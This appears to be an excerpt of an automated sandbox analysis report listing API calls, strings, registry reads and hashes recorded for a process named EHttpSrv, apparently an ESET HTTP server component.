                                                                                                                  • Part of subcall function 2042FDE0: GetCurrentObject.GDI32(?,00000001), ref: 2042FE0D
                                                                                                                  • Part of subcall function 2042FDE0: #2362.MFC80U(00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE14
                                                                                                                  • Part of subcall function 2042FDE0: GetSysColor.USER32(00000008), ref: 2042FE1D
                                                                                                                  • Part of subcall function 2042FDE0: #502.MFC80U(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,FEEA6C22), ref: 2042FE2C
                                                                                                                  • Part of subcall function 2042FDE0: #5638.MFC80U(00000001), ref: 2042FE40
                                                                                                                  • Part of subcall function 2042FDE0: GetObjectW.GDI32(?,00000010,?), ref: 2042FE50
                                                                                                                  • Part of subcall function 2042FDE0: SetPixel.GDI32(?,?,?,?), ref: 2042FE88
                                                                                                                  • Part of subcall function 2042FDE0: #4117.MFC80U(?,?,?), ref: 2042FE9D
                                                                                                                  • Part of subcall function 2042FDE0: #3995.MFC80U(?,?,?,?,?), ref: 2042FEAF
                                                                                                                  • Part of subcall function 2042FDE0: #4117.MFC80U(?,?,?,?,?,?,?,?), ref: 2042FEC3
                                                                                                                  • Part of subcall function 2042FDE0: #3995.MFC80U(?,?,?,?,?,?,?,?,?,?), ref: 2042FED5
                                                                                                                  • Part of subcall function 2042FDE0: #4117.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2042FEE9
                                                                                                                  • Part of subcall function 2042FCB0: CopyRect.USER32(?,?), ref: 2042FCE3
                                                                                                                  • Part of subcall function 2042FCB0: GetSysColor.USER32(00000010), ref: 2042FD0A
                                                                                                                  • Part of subcall function 2042FCB0: #502.MFC80U(00000000,00000001,00000000,?,?,?,?), ref: 2042FD19
                                                                                                                  • Part of subcall function 2042FCB0: #5638.MFC80U(?), ref: 2042FD2D
                                                                                                                  • Part of subcall function 2042FCB0: #4117.MFC80U(?,?,?,?), ref: 2042FD3B
                                                                                                                  • Part of subcall function 2042FCB0: #3995.MFC80U(?,?,?,?,?,?), ref: 2042FD46
                                                                                                                  • Part of subcall function 2042FCB0: GetSysColor.USER32(00000014), ref: 2042FD55
                                                                                                                  • Part of subcall function 2042FCB0: #502.MFC80U(00000000,00000001,00000000), ref: 2042FD64
                                                                                                                  • Part of subcall function 2042FCB0: #5638.MFC80U(?,00000000,00000001,00000000), ref: 2042FD75
                                                                                                                  • Part of subcall function 2042FCB0: #4117.MFC80U(?,?,?,?,00000000,00000001,00000000), ref: 2042FD83
                                                                                                                  • Part of subcall function 2042FCB0: #3995.MFC80U(00000001,?,?,?,?,?,00000000,00000001,00000000), ref: 2042FD90
                                                                                                                • #589.MFC80U(?,?), ref: 2042FC8E
                                                                                                                Similarity
                                                                                                                • API ID: #4117$#3995$#502#5638Color$ObjectRect$#2362#330#4755#589ClientCopyCurrentPixel
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 20433B9A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 20433BA9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 204317F9
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431806
                                                                                                                  • Part of subcall function 204316C0: PtInRect.USER32(?,?,?), ref: 20431813
                                                                                                                • SetCursor.USER32(00000000,?,00000000,?,?), ref: 20433BCD
                                                                                                                • #1894.MFC80U ref: 20433BE1
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Cursor$#1894ClientScreen
                                                                                                                APIs
                                                                                                                • #1946.MFC80U(?,?,2042F9D5,?,?), ref: 2042FBA7
                                                                                                                • CreatePopupMenu.USER32 ref: 2042FBAC
                                                                                                                • #1274.MFC80U(00000000,?,?), ref: 2042FBB5
                                                                                                                • AppendMenuW.USER32(?,00000000,?), ref: 2042FBED
                                                                                                                Similarity
                                                                                                                • API ID: Menu$#1274#1946AppendCreatePopup
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,00000000,20479989,000000FF,20444EE3,?,?,20441B98,00000000), ref: 20444F15
                                                                                                                  • Part of subcall function 20464370: #310.MFC80U(FEEA6C22,?,?,?,?), ref: 204643C1
                                                                                                                  • Part of subcall function 20464370: #310.MFC80U ref: 204643D6
                                                                                                                  • Part of subcall function 20464370: #776.MFC80U(?), ref: 204643F5
                                                                                                                  • Part of subcall function 20464370: #578.MFC80U ref: 20464782
                                                                                                                  • Part of subcall function 20464370: #578.MFC80U ref: 20464797
                                                                                                                • #2310.MFC80U(?,000001F9,?,0002081F,?,?,20441B98,00000000), ref: 20444F47
                                                                                                                • #4026.MFC80U(000001F8), ref: 20444F5B
                                                                                                                • #578.MFC80U ref: 20444F6D
                                                                                                                Similarity
                                                                                                                • API ID: #310#578$#2310#4026#776
                                                                                                                APIs
                                                                                                                • DestroyCursor.USER32(?), ref: 20461CFB
                                                                                                                • #741.MFC80U(FEEA6C22,00000000,00000000,2047A32F,000000FF,204609F4,?), ref: 20461D09
                                                                                                                • #578.MFC80U(FEEA6C22,00000000,00000000,2047A32F,000000FF,204609F4,?), ref: 20461D16
                                                                                                                • #605.MFC80U ref: 20461D26
                                                                                                                Similarity
                                                                                                                • API ID: #578#605#741CursorDestroy
                                                                                                                APIs
                                                                                                                • #620.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239A3
                                                                                                                • #620.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239B3
                                                                                                                • #587.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239C3
                                                                                                                • #605.MFC80U(FEEA6C22,?,00000000,2047B72C,000000FF,20429D63,?), ref: 204239D2
                                                                                                                Similarity
                                                                                                                • API ID: #620$#587#605
APIs
• #764.MFC80U(2040FAB2,?,2041270C), ref: 20410EEB
• #764.MFC80U(000000FF,?,2041270C), ref: 20410EFB
• #764.MFC80U(20481BC6,?,2041270C), ref: 20410F0B
• #764.MFC80U(?,?,2041270C), ref: 20410F1B
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
Similarity
• API ID: #764
• String ID:
APIs
• #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AC8
• #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AD8
• #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AE8
• #764.MFC80U(?,20412D1A,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000), ref: 20412AF8
Similarity
• API ID: #764
• String ID:
APIs
  • Part of subcall function 20402090: _wcsicmp.MSVCR80 ref: 204020FE
• #1176.MFC80U ref: 2041A3AF
Strings
Similarity
• API ID: #1176_wcsicmp
• String ID: RULE$RULES
APIs
  • Part of subcall function 20402090: _wcsicmp.MSVCR80 ref: 204020FE
• #1176.MFC80U ref: 2041F86B
Strings
Similarity
• API ID: #1176_wcsicmp
• String ID: ZONE$ZONES
APIs
Strings
Similarity
• API ID: wcscpy_s
• String ID: ;TYPE=SUBNODE
APIs
Strings
Similarity
• API ID: wcstoul
• String ID: END
APIs
Strings
Similarity
• API ID: wcstoul
• String ID: END
APIs
• #764.MFC80U(?,USER_NAME,?,?,2041A6FB,?,?,?,APP,00000000,?), ref: 204169C2
• #265.MFC80U(00000000,USER_NAME,?,?,2041A6FB,?,?,?,APP,00000000,?), ref: 20416A19
Strings
Similarity
• API ID: #265#764
• String ID: USER_NAME
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,USER_NAME,?,?,2041F9F5,?,?,?,?,?,?,00000000,?,00000000), ref: 2041D2BF
                                                                                                                • #265.MFC80U(00000000,USER_NAME,?,?,2041F9F5,?,?,?,?,?,?,00000000,?,00000000), ref: 2041D313
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: USER_NAME
                                                                                                                • API String ID: 2915978212-2711683876
                                                                                                                APIs
                                                                                                                • wcstoul.MSVCR80 ref: 20416B94
                                                                                                                • #1176.MFC80U(00000000,?,?,?,?,?,?,?,?,?,?,APP,00000000,?), ref: 20416BB8
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #1176wcstoul
                                                                                                                • String ID: VALUE
                                                                                                                • API String ID: 3675936516-3928201860
                                                                                                                APIs
                                                                                                                • wcstoul.MSVCR80 ref: 20416CE4
                                                                                                                • #1176.MFC80U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,APP,00000000,?), ref: 20416D0B
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #1176wcstoul
                                                                                                                • String ID: VALUE
                                                                                                                • API String ID: 3675936516-3928201860
                                                                                                                APIs
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047AD46,000000FF,204311D8,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431125
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047AD46,000000FF,204311D8,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431158
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #2340
                                                                                                                • String ID: Z}G
                                                                                                                • API String ID: 2713651825-1569403603
                                                                                                                APIs
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047ADC6,000000FF,2043120B,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F), ref: 20430FC5
                                                                                                                • #2340.MFC80U(FEEA6C22,?,?,?,2047ADC6,000000FF,2043120B,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F), ref: 20430FF8
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #2340
                                                                                                                • String ID: Z}G `IC
                                                                                                                • API String ID: 2713651825-1538320670
                                                                                                                APIs
                                                                                                                • #764.MFC80U(C483FFFF,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 20416833
                                                                                                                • #265.MFC80U(00000000,?,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 2041688A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: NAME
                                                                                                                • API String ID: 2915978212-1756795826
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,NAME,?,2041F9B3,?,?,?,?,?,00000000,?,00000000), ref: 2041D23E
                                                                                                                • #265.MFC80U(00000000,NAME,?,2041F9B3,?,?,?,?,?,00000000,?,00000000), ref: 2041D279
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: NAME
                                                                                                                • API String ID: 2915978212-1756795826
                                                                                                                APIs
                                                                                                                • #764.MFC80U(2040FAB2,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 2041146E
                                                                                                                • #265.MFC80U(00000000,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 204114A9
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: OPTNAME
                                                                                                                • API String ID: 2915978212-2814441404
                                                                                                                APIs
                                                                                                                • #764.MFC80U(000000FF,DESC,?,204126B7,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 204114EE
                                                                                                                • #265.MFC80U(00000000,DESC,?,204126B7,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20411529
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: #265#764
                                                                                                                • String ID: DESC
                                                                                                                • API String ID: 2915978212-1025524192
                                                                                                                • Opcode ID: 93ba1ca0a8181baa6ec8efd99bbd3d08027859d3c956d3f315b04a8f9d9b367b
                                                                                                                • Instruction ID: e446cb4000a4225e02b2bc687bc2567b08fe33d186fc47da35a145bccfc8ff4a
                                                                                                                • Opcode Fuzzy Hash: 93ba1ca0a8181baa6ec8efd99bbd3d08027859d3c956d3f315b04a8f9d9b367b
                                                                                                                • Instruction Fuzzy Hash: 8E01D672A0020247C7289B69D8167A7B2E69FD0344F19C52CDD0BCB7A4EA79F946C680
APIs
• #764.MFC80U(20481BC6,TYPE,?,204126DB,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2041156E
• #265.MFC80U(00000000,TYPE,?,204126DB,?,?,?,?,?,?,?,?,?,?,?,?), ref: 204115A9
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #265#764
• String ID: TYPE
• API String ID: 2915978212-3125525149
• Opcode ID: 65d51408a0ea5b3b09fdbd41ab366035654041028fc359d7ca2011b4bd0cb090
• Instruction ID: 2cd7abbc26cf08fa152c7a898c6834cdd234cf72ce0b17dc7037bfd9d9872fd2
• Opcode Fuzzy Hash: 65d51408a0ea5b3b09fdbd41ab366035654041028fc359d7ca2011b4bd0cb090
• Instruction Fuzzy Hash: 6801D672A002014BD7285B7998167A7B3E69FD0254F09C52CDD0BCB7A4EA7DEA46C680
APIs
• #764.MFC80U(?,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 204115EE
• #265.MFC80U(00000000,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20411629
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #265#764
• String ID: GROUP
• API String ID: 2915978212-2593425013
• Opcode ID: 4441ea9952aeb4f67f9bb942b7a51cbf5afd12ee8f5ab09860910747c860d621
• Instruction ID: 078da062846c854fe8d229d4896ac332e971acb456084f57a9e1f0e622e69b6f
• Opcode Fuzzy Hash: 4441ea9952aeb4f67f9bb942b7a51cbf5afd12ee8f5ab09860910747c860d621
• Instruction Fuzzy Hash: C701DB72A0020147C7349F78D916797B2E69FD4644F0D862CDD07C77A4EA7AEE46C690
APIs
  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
• RegCloseKey.ADVAPI32(?,-00000002,-00000002,?,2043BF84), ref: 2043BC4F
  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: InstallDir$Software\ESET\ESET Security\CurrentVersion\Info
• API String ID: 3677997916-2402332192
• Opcode ID: ab5813b784cd28df3b08b768c5bf18a612f79d654d01ff718f912ac86473955e
• Instruction ID: 65131c554d5c207b059628cd951e31ba65e2829a174fefab873b5179a0dbc55e
• Opcode Fuzzy Hash: ab5813b784cd28df3b08b768c5bf18a612f79d654d01ff718f912ac86473955e
• Instruction Fuzzy Hash: 3FF046220842196AD3202BD1AC86F67B3ECEF14649F30E41DBA1082141EEBC995091E2
APIs
  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
• RegCloseKey.ADVAPI32(?,-00000002,-00000002,?,2043C2B7), ref: 2043BCCF
  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: ScannerVersion$Software\ESET\ESET Security\CurrentVersion\Info
• API String ID: 3677997916-1329455690
• Opcode ID: 4fabe655bc6b6f0cf15cd9cd466d05cb7acbe1ac770ee6e94530c14eaa8a2f53
• Instruction ID: e33bc56ea8b68f918a9df8f36d16bb2335e5f2c1da2b4c33de064e52f6140d45
• Opcode Fuzzy Hash: 4fabe655bc6b6f0cf15cd9cd466d05cb7acbe1ac770ee6e94530c14eaa8a2f53
• Instruction Fuzzy Hash: E3F0FC3104421569D3202BD5EC85F77B7ECEF25648F20E41DFA4543241EFBC985091D1
APIs
• RegQueryValueExW.ADVAPI32 ref: 2043D3C2
• RegQueryValueExW.ADVAPI32(?,Enable,00000000,?,?,00000000), ref: 2043D3F1
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: QueryValue
• String ID: Enable
• API String ID: 3660427363-4094479620
• Opcode ID: ed02eb41d3ab33f6139152233edbb16b26a503998652c18463881816d381c4c5
• Instruction ID: 21a20d413257b4013ad3e7cfe7eb5f0e01aac04d2ba5bc616c8e638391f3c8f9
• Opcode Fuzzy Hash: ed02eb41d3ab33f6139152233edbb16b26a503998652c18463881816d381c4c5
• Instruction Fuzzy Hash: FAF0C975104302AFD300CF85DC85F9BB7E8EB89610F50981DFA5886250E674EA0D9B67
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: wcscpy_swcsncpy_s
• String ID: MODIFIED
• API String ID: 2961736276-2572742880
• Opcode ID: 3b14faa9bb107d061dc084ee79fdf8e8909575ca574943e3d3af438eb1dd3a9d
• Instruction ID: 43315aadba7b460d0b3bb39ace077c631ecd9e0630d136a34f5ba29ca97b0eb9
• Opcode Fuzzy Hash: 3b14faa9bb107d061dc084ee79fdf8e8909575ca574943e3d3af438eb1dd3a9d
• Instruction Fuzzy Hash: A7E02B3120451026E210530CAC05BEB7268CFCA719F068424F506EB192D7A88B8251E5
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: wcscpy_swcsncpy_s
• String ID: MODIFIED
• API String ID: 2961736276-2572742880
• Opcode ID: 81984847ea2c89f37d3749c741d08e631871613c21970c91a36a12a16bae4335
• Instruction ID: fa8e129176709dfeb56772712bc1153eee58b06ca9e58b6c5c0c9638e17d60fa
• Opcode Fuzzy Hash: 81984847ea2c89f37d3749c741d08e631871613c21970c91a36a12a16bae4335
• Instruction Fuzzy Hash: 59E061716046146BE310570CFC06BDB73A4DFC971DF068828FD15DB292D7A49B9192E5
APIs
• LoadLibraryW.KERNEL32(Kernel32.dll,?,20407F85), ref: 20407F22
  • Part of subcall function 20478A06: __onexit.MSVCRT ref: 20478A0A
• GetProcAddress.KERNEL32(76210000,20485DD0), ref: 20407F4D
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: AddressLibraryLoadProc__onexit
• String ID: Kernel32.dll
• API String ID: 3191664640-1926710522
APIs
Strings
Similarity
• API ID: wcscpy_swcsncpy_s
• String ID: ${ProfileName}=
• API String ID: 2961736276-3568326518
APIs
Strings
Similarity
• API ID: wcscpy_swcsncpy_s
• String ID: NODE;NAME=
• API String ID: 2961736276-3737436838
APIs
Similarity
• API ID: freememset
• String ID:
• API String ID: 2499939622-0